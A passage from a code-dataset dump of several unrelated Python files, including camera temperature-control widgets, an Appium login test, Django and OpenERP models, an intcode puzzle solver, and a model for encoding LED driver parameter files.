Scheduling a new refresh\n def startJob(self):\n InfoTemp.jobRefresh = self.scheduler2.add_job(self.clockRefresh, 'interval', seconds=1)\n self.scheduler2.start()\n\n\n def startScheduler(self):\n InfoTemp.jobRefresh.resume()\n\n def stopScheduler(self):\n InfoTemp.jobRefresh.pause()\n\n\n def clockRefresh(self):\n if not MainWindow.isLocked(MainWindow):\n MainWindow.setAcquire(MainWindow)\n\n try:\n self.lcd.display(float(tuple(SbigDriver.get_temperature())[3]))\n except Exception as e:\n self.lcd.display(\"---\")\n print(\"Exception: {}\".format(e))\n finally:\n MainWindow.setRelease(MainWindow)\n\n\n # Fan Buttons\n def optionFan(self):\n MainWindow.setAcquire(MainWindow)\n\n try:\n self.btnFan = QPushButton(\"Fan: ON\", self)\n self.btnFan.clicked.connect(self.btnFan)\n except Exception as e:\n MainWindow.status(MainWindow, \"Failed. Exception: {}\".format(e))\n finally:\n MainWindow.setRelease(MainWindow)\n\n def btnFan(self):\n MainWindow.setAcquire(MainWindow)\n try:\n if (SbigDriver.is_fanning()):\n SbigDriver.stop_fan()\n self.fFan.setText(\"OFF\")\n else:\n SbigDriver.start_fan()\n self.fFan.setText(\"ON\")\n except Exception as e:\n MainWindow.status(MainWindow, \"Exception: {}\".format(e))\n finally:\n MainWindow.setRelease(MainWindow)\n\n def btnSetTemp(self):\n MainWindow.setAcquire(MainWindow)\n\n try:\n SbigDriver.set_temperature(regulation=True, setpoint=int(self.tb.toPlainText()), autofreeze=False)\n MainWindow.status(self.parent, \"Temperature set to: \" + str(int(self.tb.toPlainText())))\n except Exception as e:\n print(e)\n MainWindow.status(self.parent, \"Set temperature Failed!\")\n finally:\n MainWindow.setRelease(MainWindow)\n\n # Filter Options\n def setFilter(self):\n MainWindow.setAcquire(MainWindow)\n\n try:\n #get integer filter\n filter = self.combo.currentData()\n print(filter)\n\n #get type filter by description\n desc = self.combo.currentText()\n attr = getattr(sbigLib.CFW_POSITION, desc);\n\n SbigDriver.set_filterposition(attr)\n self.fFilter.setText(str(SbigDriver.get_filterposition()))\n print(str(SbigDriver.get_filterposition()))\n except Exception as e:\n print(e)\n finally:\n MainWindow.setRelease(MainWindow)","sub_path":"src/interface/widgets/InfoTemp.py","file_name":"InfoTemp.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"373299623","text":"import unittest\nimport os\nfrom random import randint\nfrom appium import webdriver\nfrom time import sleep\nfrom selenium.webdriver.common.keys import Keys\n\nclass LoginTests(unittest.TestCase):\n\n def setUp(self): \n app = ('/Users/laichongli/Library/Developer/Xcode/DerivedData/Coffee_Luguo-fphgosuwvglzdybzrsacxrmnulcz/Build/Products/Debug-iphonesimulator/Coffee Luguo.app')\n self.driver = webdriver.Remote(\n command_executor='http://127.0.0.1:4723/wd/hub',\n desired_capabilities={\n 'app': app,\n 'platformName': 'iOS',\n 'platformVersion': '12.0',\n 'deviceName': 'iPhone 6s'\n }\n )\n\n def tearDown(self):\n self.driver.quit()\n\n def testEmailField(self):\n self.driver.find_element_by_accessibility_id('startButton').click()\n\n if __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(LoginTests)\n unittest.TextTestRunner(verbosity=2).run(suite)","sub_path":"loginTest.py","file_name":"loginTest.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"485580049","text":"from django.contrib 
import admin\nfrom archive.models import Heading, Category, Template, Person\n\nclass CategoryInline(admin.StackedInline):\n model = Category\n\nclass HeadingAdmin(admin.ModelAdmin):\n list_display = ('name', 'code', 'chinese_code', 'sequence')\n inlines = [ CategoryInline ]\n\nclass CategoryAdmin(admin.ModelAdmin):\n list_display = ('name', 'code', 'sequence')\n\nclass TemplateAdmin(admin.ModelAdmin):\n list_display = ('name', 'category', 'sequence', 'page_count', 'approved', 'comment', 'description')\n list_filter = ('category', 'approved')\n search_fields = ['name']\n\nadmin.site.register(Heading, HeadingAdmin)\nadmin.site.register(Category, CategoryAdmin)\nadmin.site.register(Template, TemplateAdmin)\nadmin.site.register(Person)\nadmin.site.site_header = \"管理平台\"\n#admin.site.index_template = 'admin/index.html'\n#admin.autodiscover()","sub_path":"archive/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"180232708","text":"from openerp.osv import osv, fields\r\nfrom openerp import tools\r\n\r\nclass followuppartner_labresults(osv.Model):\r\n _name = \"followuppartner.labresults\"\r\n _columns = {\r\n 'visit_date':fields.date('Visit Date:'),\r\n 'partner_id': fields.many2one('res.partner', 'Sceening ID'),\r\n 'sceening_id': fields.char(string=\"Screening ID\", related='partner_id.name'),\r\n 'speccoldate':fields.date('Specimen collection date:'),\r\n 'hiv_negative':fields.boolean('A. Negative'),\r\n 'hiv_positive':fields.boolean('B. Positive'),\r\n 'hiv_indeterminate':fields.boolean('C. Indeterminate'),\r\n 'eia_negative':fields.boolean('A. Negative'),\r\n 'eia_positive':fields.boolean('B. Positive'),\r\n 'eia_indeterminate':fields.boolean('C. Indeterminate'),\r\n 'mensdate':fields.date('3. Date of last menstrual period:'),\r\n 'dont_know':fields.boolean('Don\\'t Know'),\r\n 'partpregnant':fields.selection([('1','Yes'),('2',\"No\")],\"4. Is the participant pregnant?\"),\r\n 'already_reported':fields.boolean(\"Already reported\"),\r\n 'reported_date':fields.date('Reported at visit'),\r\n 'breastfeeding':fields.selection([('1',('Yes')),('2','No')],\"5. Is the participant breastfeeding?\"),\r\n 'specimendate':fields.date('6. Specimen collection date:'),\r\n 'creatinine':fields.float('7. Creatinine:'),\r\n 'creatgrade':fields.integer(\"a. Creatinine grade (0-4)\"),\r\n 'adversevnt':fields.selection([('yes','Yes'),('no','No')],'b. Is this an adverse event?'),\r\n 'reltomed':fields.selection([('1','Definitely related '),('2','Probably related'),('3','Possibly related'),('4','Probably not related'),('5','pending')],\"c. Relationship to study medication:\"),\r\n 'creatinine_clear':fields.float('8. Creatinine clearance:'),\r\n } \r\n","sub_path":"followup_partner_followup_lab_results/followup_partner_followup_lab_results.py","file_name":"followup_partner_followup_lab_results.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"250300334","text":"# Classes Variables: dict command\n\nclass Employee:\n\n raise_amount = 1.04\n\n def __init__(self, first, last, pay):\n self.first = first\n self.last = last\n self.pay = pay\n self.email = first + '.' 
+ last + '@company.com'\n\n    def fullname(self):\n        return '{} {}'.format(self.first, self.last)\n\n    def apply_raise(self):\n        self.pay = int(self.pay * self.raise_amount)\n\n\nemp_1 = Employee('Corey', 'Schafer', 50000)\nemp_2 = Employee('Test', 'User', 60000)\n\n# __dict__ command lets us see all characteristics / attributes of emp_1 (in other words its namespace)\nprint(emp_1.__dict__)\n\n# Prints out different attributes (class variables) of Employee class\nprint(Employee.__dict__)\n\n","sub_path":"Fundamentals/9 Object-Oriented Programming/2 Class Variables/2.1.3.py","file_name":"2.1.3.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}{"seq_id":"547410252","text":"def run(codes):\n    opCodeIndex = 0\n    while True:\n        opCode = codes[opCodeIndex]\n        modes = processOpCode(opCode)\n        operation = modes[3:]\n        if operation == [9, 9]:  # Halt\n            return codes\n        codeLength = executeOp(codes, modes, operation, opCodeIndex)\n        opCodeIndex += codeLength\n\n\ndef processOpCode(opCode):\n    modes = [int(num) for num in str(opCode)]\n    while len(modes) < 5:\n        modes.insert(0, 0)\n    return modes\n\ndef executeOp(codes, modes, operation, opCodeIndex):\n    # Returns how far the instruction ptr needs to travel\n    param1 = codes[opCodeIndex + 1]\n    param2 = codes[opCodeIndex + 2]\n    param3 = codes[opCodeIndex + 3]\n\n    if operation == [0, 1]:  # Add\n        add(codes, param1, param2, param3, modes)\n        return 4\n    elif operation == [0, 2]:  # Multiply\n        multiply(codes, param1, param2, param3, modes)\n        return 4\n    elif operation == [0, 3]:  # Store input at address\n        codes[param1] = 1  # program input value\n        return 2\n    elif operation == [0, 4]:  # Output element at address\n        print(codes[param1])\n        return 2\n    else:\n        print(\"ERROR: \" + str(codes[opCodeIndex]))\n        return\n\ndef add(codes, param1, param2, param3, modes):\n    mode1 = modes[2]\n    mode2 = modes[1]\n    num1, num2 = None, None\n\n    if mode1 == 0:\n        num1 = codes[param1]\n    elif mode1 == 1:\n        num1 = param1\n\n    if mode2 == 0:\n        num2 = codes[param2]\n    elif mode2 == 1:\n        num2 = param2\n\n    codes[param3] = num1 + num2\n\ndef multiply(codes, param1, param2, param3, modes):\n    mode1 = modes[2]\n    mode2 = modes[1]\n    num1, num2 = None, None\n\n    if mode1 == 0:\n        num1 = codes[param1]\n    elif mode1 == 1:\n        num1 = param1\n\n    if mode2 == 0:\n        num2 = codes[param2]\n    elif mode2 == 1:\n        num2 = param2\n\n    codes[param3] = num1 * num2\n\nif __name__ == \"__main__\":\n    with open(\"input.txt\", 'r') as myfile:\n        input = myfile.read()\n    originalCodes = [int(num) for num in input.split(',')]\n    finalCodes = run(originalCodes)\n","sub_path":"5.1/5.1.py","file_name":"5.1.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}{"seq_id":"566303128","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name='SchedulingPackage',\n    version='0.0.1',\n    author='Steven Verwerft',\n    author_email='steven.verwerft@uantwerpen.be',\n    description='A dummy project developed for the Uantwerp doctoral course \\'Optimization with Metaheuristics\\';'\n                ' the package contains code for instance generation, a tabu search solver, and a racing algorithm.',\n    long_description=long_description,\n    url='http://github.com/StevenVerwerft/scheduling_package',\n    packages=setuptools.find_packages(),\n    classifiers=[\"Programming Language :: Python :: 3\",\n                 \"Operating System :: Darwin, 
Win32\"],\n)\n","sub_path":"scheduling_package/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"595129455","text":"from pathlib import Path\nfrom django.db import models\nfrom . import fields\n# from django.core.validators import MinValueValidator, MaxValueValidator\n\n# * Help functions\n\n\ndef split_2b(twobyte):\n \"\"\" split a 16 bit integer number (<=65535) into two 8 bit integers (<=255) \"\"\"\n lsb = twobyte % 256\n msb = twobyte // 256\n return [str(lsb), str(msb)]\n\n\ndef merge_2b(lsb, msb):\n \"\"\" merge two 8 bit integer numbers (<=255) into one 16 bit integer number (<=65535) \"\"\"\n twobyte = int(lsb) + 256 * int(msb)\n return twobyte\n\n\n# * Create your models here.\n\n\nclass Parameter(models.Model):\n \"\"\"\n Non integer information:\n - short_name: short name for the parameter file (max_length = 50)\n - csv_name: file name of the csv file (max_length = 60)\n - category: OMNI/SafeLED/SafeSign/...\n\n Integer information:\n Holds bytes that are described in documentation with short names:\n - Bytes 0-127: all 0xFF\n - Bytes 128-215: describted in this model\n - Bytes 216-255: all 0xFF\n * SIDENOTE/TODO on last block -> 220-221 found to be populated: WHAT IS THIS?\n \"\"\"\n\n @ classmethod\n def upload_file(cls, path, category=None):\n \"\"\" create a DB entry based on a file path \"\"\"\n with open(path) as file:\n lines = file.readlines()\n data = []\n for line in lines:\n if \";\" in line:\n if len(line.split(\";\")) == 257:\n data = line.split(\";\")\n if isinstance(data, list) and len(data) == 257:\n temp = cls()\n temp.csv_name = path.name\n temp.short_name = data[0]\n temp.category = category\n del data[0]\n data = list(map(int, data))\n temp.load_params_from_256_list(data)\n return temp\n else:\n raise AttributeError(\"data parsed is not right format\")\n\n @ classmethod\n def upload_string(cls, string, csv_name, category=None):\n \"\"\" create a DB entry based on a stream/string \"\"\"\n delim = \";\" if \";\" in string else \",\"\n temp = string.rstrip().split(delim)\n ret = cls()\n ret.csv_name = csv_name\n ret.short_name = temp[0]\n del temp[0]\n ret.category = category\n temp = list(map(int, temp))\n ret.load_params_from_256_list(temp)\n return ret\n\n # * NON INTEGER FIELDS\n short_name = models.CharField(max_length=50, default=\"default\")\n csv_name = models.CharField(\n max_length=60, default=\"default.csv\", unique=True)\n cat_choices = [\n (\"OMNI\", \"Omnidirectional range application\"),\n (\"SL\", \"SafeLED application\"),\n (\"Sign\", \"SafeSign application\"),\n ]\n category = models.CharField(\n max_length=50, choices=cat_choices, blank=True, null=True, default=None)\n\n # * INTEGER FIELDS\n # /i led settings parameters\n nominal_voltage_1b = fields.OneByteField() # - byte 139\n # ! nominal_voltage_1b * 100 mV\n nominal_current_2b = fields.TwoByteField() # - byte 137 (LSB), byte 138 (MSB)\n number_of_leds_1b = fields.OneByteField() # - byte 145\n led_revision_1b = fields.OneByteField(default=0) # - byte 146\n # ! LED revision 0: shortLED not mounted, LED revision 1: shortLED mounted\n min_lin_dim_2b = fields.TwoByteField(\n default=300) # - byte 202 (LSB), byte 203 (MSB)\n digital_dim_freq_2b = fields.TwoByteField(\n default=610) # - byte 204 (LSB), byte 205 (MSB)\n min_on_time_2b = fields.TwoByteField() # - byte 208 (LSB), byte 209 (MSB)\n # ! used in real life? 
meant for HPC according to docs?\n nominal_voltage_2b = fields.TwoByteField() # - byte 210 (LSB), byte 211 (MSB)\n # ! nominal_voltage_2b * 10 mV, also used for voltage control in HPC!\n load_type_1b = fields.OneByteField() # - byte 212\n # ! 255 - constant current application, 254 - sign application (constant voltage)\n dual_mon_1b = fields.OneByteField() # - byte 215\n # ! for HPC, if 255 channels act independent of each other on fautlts, if 1 they act together as one\n\n # /i dimming curve paramters\n dimming_curve_14_2b = fields.TwoByteField() # - byte 147 (LSB), byte 148 (MSB)\n dimming_curve_28_2b = fields.TwoByteField() # - byte 149 (LSB), byte 150 (MSB)\n dimming_curve_34_2b = fields.TwoByteField() # - byte 151 (LSB), byte 152 (MSB)\n dimming_curve_41_2b = fields.TwoByteField() # - byte 153 (LSB), byte 154 (MSB)\n dimming_curve_48_2b = fields.TwoByteField() # - byte 155 (LSB), byte 156 (MSB)\n dimming_curve_52_2b = fields.TwoByteField() # - byte 157 (LSB), byte 158 (MSB)\n dimming_curve_55_2b = fields.TwoByteField() # - byte 159 (LSB), byte 160 (MSB)\n dimming_curve_66_2b = fields.TwoByteField() # - byte 161 (LSB), byte 162 (MSB)\n\n # /i flux compensation curve parameters\n flux_comp_m25_1b = fields.OneByteField() # - byte 163\n flux_comp_0_1b = fields.OneByteField() # - byte 164\n flux_comp_25_1b = fields.OneByteField() # - byte 165\n flux_comp_50_1b = fields.OneByteField() # - byte 166\n flux_comp_75_1b = fields.OneByteField() # - byte 167\n flux_comp_max_1b = fields.OneByteField() # - byte 168\n\n # /i artic kit parameters\n ak_power_1window_1b = fields.OneByteField() # - byte 213\n ak_power_2window_1b = fields.OneByteField() # - byte 214\n\n # /i release info parameters\n rel_year_1b = fields.OneByteField(default=20) # - byte 128\n rel_week_1b = fields.OneByteField(default=43) # - byte 129\n rel_ver_1b = fields.OneByteField(default=1) # - byte 130\n rel_not_used_1b = fields.OneByteField(default=0) # - byte 131\n inv_rel_year_1b = fields.OneByteField(default=235) # - byte 132\n inv_rel_week_1b = fields.OneByteField(default=212) # - byte 133\n inv_rel_ver_1b = fields.OneByteField(default=254) # - byte 134\n inv_rel_not_used_1b = fields.OneByteField(default=255) # - byte 135\n # ! default to moment of making this file, just for fucking fun\n\n # /i programming data parameters\n year_1b = fields.OneByteField(default=20) # - byte 171\n month_1b = fields.OneByteField(default=10) # - byte 172\n day_1b = fields.OneByteField(default=23) # - byte 173\n hour_1b = fields.OneByteField(default=23) # - byte 174\n # ! default to moment of making this file, just for fucking fun\n\n # /i general/useless parameters\n type_1b = fields.OneByteField(default=1) # - byte 136\n # ! default to value 1\n thermal_resistance_1b = fields.OneByteField(default=10) # - byte 140\n # ! used as thermal resistance between LED measurement and LED junction\n max_junction_temp_1b = fields.OneByteField(default=130) # - byte 141\n flux_bin_info_1b = fields.OneByteField(default=180) # - byte 142\n color_1b = fields.OneByteField(default=156) # - byte 143\n # ! 
4nm per increment, useless (not used)\n fitting_type_1b = fields.OneByteField(default=1) # - byte 144\n\n # /i depreciated/not-implemented parameters\n led_pwm_l1_b2 = fields.TwoByteField() # - byte 175 (LSB), byte 176 (MSB)\n led_pwm_l2_b2 = fields.TwoByteField() # - byte 177 (LSB), byte 178 (MSB)\n led_pwm_l3_b2 = fields.TwoByteField() # - byte 179 (LSB), byte 180 (MSB)\n led_pwm_l4_b2 = fields.TwoByteField() # - byte 181 (LSB), byte 182 (MSB)\n led_pwm_l5_b2 = fields.TwoByteField() # - byte 183 (LSB), byte 184 (MSB)\n led_pwm_l6_b2 = fields.TwoByteField() # - byte 185 (LSB), byte 186 (MSB)\n u_led_vl1_b2 = fields.TwoByteField() # - byte 187 (LSB), byte 188 (MSB)\n u_led_vl2_b2 = fields.TwoByteField() # - byte 189 (LSB), byte 190 (MSB)\n u_led_vl3_b2 = fields.TwoByteField() # - byte 191 (LSB), byte 192 (MSB)\n u_led_vl4_b2 = fields.TwoByteField() # - byte 193 (LSB), byte 194 (MSB)\n u_led_vl5_b2 = fields.TwoByteField() # - byte 195 (LSB), byte 196 (MSB)\n u_led_vl6_b2 = fields.TwoByteField() # - byte 197 (LSB), byte 198 (MSB)\n\n # /i CRC parameters\n # TODO: ask/look around for algorithm to try to calculate yourself from inputs of other fields?\n crc_2b = fields.TwoByteField() # - byte 199 (LSB), byte 200 (MSB)\n # ! based on bytes 128-198\n\n # /i unknown parameters?\n reserved_version_2b = fields.TwoByteField(\n default=0) # - byte 169 (LSB), byte 170 (MSB)\n length_block1_1b = fields.OneByteField(default=18) # - byte 201\n vf_short_threshold_fast = fields.OneByteField() # - byte 206\n vf_short_threshold_slow = fields.OneByteField() # - byte 207\n\n def update_dimming_curve(self, dimlist):\n self.dimming_curve_14_2b = dimlist[0]\n self.dimming_curve_28_2b = dimlist[1]\n self.dimming_curve_34_2b = dimlist[2]\n self.dimming_curve_41_2b = dimlist[3]\n self.dimming_curve_48_2b = dimlist[4]\n self.dimming_curve_52_2b = dimlist[5]\n self.dimming_curve_55_2b = dimlist[6]\n self.dimming_curve_66_2b = dimlist[7]\n\n @ property\n def dimming_curve(self):\n ret = [self.dimming_curve_14_2b, self.dimming_curve_28_2b, self.dimming_curve_34_2b, self.dimming_curve_41_2b,\n self.dimming_curve_48_2b, self.dimming_curve_52_2b, self.dimming_curve_55_2b, self.dimming_curve_66_2b]\n return ret\n\n def update_full_flux(self, flux):\n self.flux_comp_m25_1b = flux\n self.flux_comp_0_1b = flux\n self.flux_comp_25_1b = flux\n self.flux_comp_50_1b = flux\n self.flux_comp_75_1b = flux\n self.flux_comp_max_1b = flux\n\n @ property\n def flux_analysis(self):\n ret = self.flux_comp_m25_1b if self.flux_comp_m25_1b == self.flux_comp_0_1b == self.flux_comp_25_1b == self.flux_comp_50_1b == self.flux_comp_75_1b == self.flux_comp_max_1b else \"Varying!\"\n return ret\n\n def update_nominal_voltage(self, volt):\n \"\"\" volt is in (V) unit, whether to use 1 byte field or 2 byte field is autodetected \"\"\"\n if volt <= 25.5:\n self.nominal_voltage_1b = round(volt * 10)\n self.nominal_voltage_2b = 65535\n else:\n self.nominal_voltage_1b = 255\n self.nominal_voltage_2b = round(volt * 100)\n\n @ property\n def real_nom_voltage(self):\n if self.nominal_voltage_2b == 65535:\n return self.nominal_voltage_1b / 10\n else:\n return self.nominal_voltage_2b / 100\n\n def _get_full_file(self):\n release_info = [self.rel_year_1b, self.rel_week_1b, self.rel_ver_1b, self.rel_not_used_1b,\n self.inv_rel_year_1b, self.inv_rel_week_1b, self.inv_rel_ver_1b, self.inv_rel_not_used_1b]\n dimming_curve = split_2b(self.dimming_curve_14_2b) + split_2b(self.dimming_curve_28_2b) + split_2b(self.dimming_curve_34_2b) + 
split_2b(self.dimming_curve_41_2b) + \\\n split_2b(self.dimming_curve_48_2b) + split_2b(self.dimming_curve_52_2b) + \\\n split_2b(self.dimming_curve_55_2b) + \\\n split_2b(self.dimming_curve_66_2b)\n flux_comp = [self.flux_comp_m25_1b, self.flux_comp_0_1b, self.flux_comp_25_1b,\n self.flux_comp_50_1b, self.flux_comp_75_1b, self.flux_comp_max_1b]\n programming_date = [self.year_1b,\n self.month_1b, self.day_1b, self.hour_1b]\n depr1 = split_2b(self.led_pwm_l1_b2) + split_2b(self.led_pwm_l2_b2) + split_2b(self.led_pwm_l3_b2) + \\\n split_2b(self.led_pwm_l4_b2) + split_2b(self.led_pwm_l5_b2) + \\\n split_2b(self.led_pwm_l6_b2)\n depr2 = split_2b(self.u_led_vl1_b2) + split_2b(self.u_led_vl2_b2) + split_2b(self.u_led_vl3_b2) + \\\n split_2b(self.u_led_vl4_b2) + split_2b(self.u_led_vl5_b2) + \\\n split_2b(self.u_led_vl6_b2)\n full = [self.short_name] + [255] * 128 + release_info + [self.type_1b] + split_2b(self.nominal_current_2b) + [self.nominal_voltage_1b] + [self.thermal_resistance_1b] + [self.max_junction_temp_1b] + [\n self.flux_bin_info_1b] + [self.color_1b] + [self.fitting_type_1b] + [self.number_of_leds_1b] + [self.led_revision_1b] + dimming_curve + flux_comp + split_2b(self.reserved_version_2b) + programming_date + depr1 + depr2 + split_2b(self.crc_2b) + [self.length_block1_1b] + split_2b(self.min_lin_dim_2b) + split_2b(self.digital_dim_freq_2b) + [\n self.vf_short_threshold_fast] + [self.vf_short_threshold_slow] + split_2b(self.min_on_time_2b) + split_2b(self.nominal_voltage_2b) + [self.load_type_1b] + [self.ak_power_1window_1b] + [self.ak_power_2window_1b] + [self.dual_mon_1b] + [255] * 40\n return full\n\n def create_file(self, target_dir):\n output = [str(e) for e in self._get_full_file()]\n full_path = Path(target_dir, self.csv_name).resolve()\n with open(full_path, \"w\") as f:\n f.write(\";\".join(output)) # - SEMICOLON!!!!\n f.write(\"\\n\")\n return full_path\n\n def get_relevent_list(self):\n temp = [int(e) for e in self._get_full_file()[129:217]]\n keys = list(range(128, 216, 1))\n print(len(temp), len(keys))\n ret = dict(zip(keys, temp))\n ret[\"csv_name\"] = self.csv_name\n ret[\"short_name\"] = self.short_name\n ret[\"category\"] = self.category\n return ret\n\n def __str__(self):\n return self.short_name\n\n def load_params_from_256_list(self, l):\n self.rel_year_1b = l[128]\n self.rel_week_1b = l[129]\n self.rel_ver_1b = l[130]\n self.rel_not_used_1b = l[131]\n self.inv_rel_year_1b = l[132]\n self.inv_rel_week_1b = l[133]\n self.inv_rel_ver_1b = l[134]\n self.inv_rel_not_used_1b = l[135]\n self.type_1b = l[136]\n self.nominal_current_2b = merge_2b(l[137], l[138])\n self.nominal_voltage_1b = l[139]\n self.thermal_resistance_1b = l[140]\n self.max_junction_temp_1b = l[141]\n self.flux_bin_info_1b = l[142]\n self.color_1b = l[143]\n self.fitting_type_1b = l[144]\n self.number_of_leds_1b = l[145]\n self.led_revision_1b = l[146]\n self.dimming_curve_14_2b = merge_2b(l[147], l[148])\n self.dimming_curve_28_2b = merge_2b(l[149], l[150])\n self.dimming_curve_34_2b = merge_2b(l[151], l[152])\n self.dimming_curve_41_2b = merge_2b(l[153], l[154])\n self.dimming_curve_48_2b = merge_2b(l[155], l[156])\n self.dimming_curve_52_2b = merge_2b(l[157], l[158])\n self.dimming_curve_55_2b = merge_2b(l[159], l[160])\n self.dimming_curve_66_2b = merge_2b(l[161], l[162])\n self.flux_comp_m25_1b = l[163]\n self.flux_comp_0_1b = l[164]\n self.flux_comp_25_1b = l[165]\n self.flux_comp_50_1b = l[166]\n self.flux_comp_75_1b = l[167]\n self.flux_comp_max_1b = l[168]\n self.reserved_version_2b = 
merge_2b(l[169], l[170])\n self.year_1b = l[171]\n self.month_1b = l[172]\n self.day_1b = l[173]\n self.hour_1b = l[174]\n self.led_pwm_l1_b2 = merge_2b(l[175], l[176])\n self.led_pwm_l2_b2 = merge_2b(l[177], l[178])\n self.led_pwm_l3_b2 = merge_2b(l[179], l[180])\n self.led_pwm_l4_b2 = merge_2b(l[181], l[182])\n self.led_pwm_l5_b2 = merge_2b(l[183], l[184])\n self.led_pwm_l6_b2 = merge_2b(l[185], l[186])\n self.u_led_vl1_b2 = merge_2b(l[187], l[188])\n self.u_led_vl2_b2 = merge_2b(l[189], l[190])\n self.u_led_vl3_b2 = merge_2b(l[191], l[192])\n self.u_led_vl4_b2 = merge_2b(l[193], l[194])\n self.u_led_vl5_b2 = merge_2b(l[195], l[196])\n self.u_led_vl6_b2 = merge_2b(l[197], l[198])\n self.crc_2b = merge_2b(l[199], l[200])\n self.length_block1_1b = l[201]\n self.min_lin_dim_2b = merge_2b(l[202], l[203])\n self.digital_dim_freq_2b = merge_2b(l[204], l[205])\n self.vf_short_threshold_fast = l[206]\n self.vf_short_threshold_slow = l[207]\n self.min_on_time_2b = merge_2b(l[208], l[209])\n self.nominal_voltage_2b = merge_2b(l[210], l[211])\n self.load_type_1b = l[212]\n self.ak_power_1window_1b = l[213]\n self.ak_power_2window_1b = l[214]\n self.dual_mon_1b = l[215]\n\n def get_four_way_tuple(self):\n ret = []\n colors = {\"relprog\": \"#e95b0b\", \"led\": \"#ed7103\",\n \"dimming\": \"#f8b123\", \"flux\": \"#e8b135\", \"varia\": \"#f49b01\"}\n ret.append((\"Rel year\", \"128\", self.rel_year_1b, colors[\"relprog\"]))\n ret.append((\"Rel week\", \"129\", self.rel_week_1b, colors[\"relprog\"]))\n ret.append((\"Rel version\", \"130\", self.rel_ver_1b, colors[\"relprog\"]))\n ret.append((\"Rel not used\", \"131\", self.rel_not_used_1b,\n colors[\"relprog\"]))\n ret.append((\"Rel year inv\", \"132\", self.inv_rel_year_1b,\n colors[\"relprog\"]))\n ret.append((\"Rel week inv\", \"133\", self.inv_rel_week_1b,\n colors[\"relprog\"]))\n ret.append((\"Rel version inv\", \"134\", self.inv_rel_ver_1b,\n colors[\"relprog\"]))\n ret.append((\"Rel not used inv\", \"135\",\n self.inv_rel_not_used_1b, colors[\"relprog\"]))\n ret.append((\"Type\", \"136\", self.type_1b, colors[\"varia\"]))\n ret.append((\"Nom current (mA)\", \"137 & 138\",\n self.nominal_current_2b, colors[\"led\"]))\n ret.append((\"Nom voltage (x100mV) (1b)\", \"139\",\n self.nominal_voltage_1b, colors[\"led\"]))\n ret.append((\"Therm res (°C/W)\", \"140\",\n self.thermal_resistance_1b, colors[\"varia\"]))\n ret.append((\"Max junc temp (°C)\", \"141\",\n self.max_junction_temp_1b, colors[\"varia\"]))\n ret.append((\"Flux bin info\", \"142\", self.flux_bin_info_1b,\n colors[\"varia\"]))\n ret.append((\"Color\", \"143\", self.color_1b, colors[\"varia\"]))\n ret.append((\"Fitting type\", \"144\", self.fitting_type_1b,\n colors[\"varia\"]))\n ret.append((\"Number of LEDs\", \"145\",\n self.number_of_leds_1b, colors[\"led\"]))\n ret.append((\"LED revision\", \"146\", self.led_revision_1b,\n colors[\"led\"]))\n ret.append((\"DC 1.4A (mA)\", \"147 & 148\",\n self.dimming_curve_14_2b, colors[\"dimming\"]))\n ret.append((\"DC 2.8A (mA)\", \"149 & 150\",\n self.dimming_curve_28_2b, colors[\"dimming\"]))\n ret.append((\"DC 3.4A (mA)\", \"151 & 152\",\n self.dimming_curve_34_2b, colors[\"dimming\"]))\n ret.append((\"DC 4.1A (mA)\", \"153 & 154\",\n self.dimming_curve_41_2b, colors[\"dimming\"]))\n ret.append((\"DC 4.8A (mA)\", \"155 & 156\",\n self.dimming_curve_48_2b, colors[\"dimming\"]))\n ret.append((\"DC 5.2A (mA)\", \"157 & 158\",\n self.dimming_curve_52_2b, colors[\"dimming\"]))\n ret.append((\"DC 5.5A (mA)\", \"159 & 160\",\n 
self.dimming_curve_55_2b, colors[\"dimming\"]))\n ret.append((\"DC 6.6A (mA)\", \"161 & 162\",\n self.dimming_curve_66_2b, colors[\"dimming\"]))\n ret.append((\"Flux comp m25°C (%)\", \"163\",\n self.flux_comp_m25_1b, colors[\"flux\"]))\n ret.append((\"Flux comp 0°C (%)\", \"164\",\n self.flux_comp_0_1b, colors[\"flux\"]))\n ret.append((\"Flux comp 25°C (%)\", \"165\",\n self.flux_comp_25_1b, colors[\"flux\"]))\n ret.append((\"Flux comp 50°C (%)\", \"166\",\n self.flux_comp_50_1b, colors[\"flux\"]))\n ret.append((\"Flux comp 75°C (%)\", \"167\",\n self.flux_comp_75_1b, colors[\"flux\"]))\n ret.append((\"Flux comp Max (%)\", \"168\",\n self.flux_comp_max_1b, colors[\"flux\"]))\n ret.append((\"Reserved version\", \"169 & 170\",\n self.reserved_version_2b, colors[\"varia\"]))\n ret.append((\"Prog year\", \"171\", self.year_1b, colors[\"relprog\"]))\n ret.append((\"Prog month\", \"172\", self.month_1b, colors[\"relprog\"]))\n ret.append((\"Prog date\", \"173\", self.day_1b, colors[\"relprog\"]))\n ret.append((\"Prog hour\", \"174\", self.hour_1b, colors[\"relprog\"]))\n ret.append((\"LED PWM level 1\", \"175 & 176\",\n self.led_pwm_l1_b2, colors[\"varia\"]))\n ret.append((\"LED PWM level 2\", \"177 & 178\",\n self.led_pwm_l2_b2, colors[\"varia\"]))\n ret.append((\"LED PWM level 3\", \"179 & 180\",\n self.led_pwm_l3_b2, colors[\"varia\"]))\n ret.append((\"LED PWM level 4\", \"181 & 182\",\n self.led_pwm_l4_b2, colors[\"varia\"]))\n ret.append((\"LED PWM level 5\", \"183 & 184\",\n self.led_pwm_l5_b2, colors[\"varia\"]))\n ret.append((\"LED PWM level 6\", \"185 & 186\",\n self.led_pwm_l6_b2, 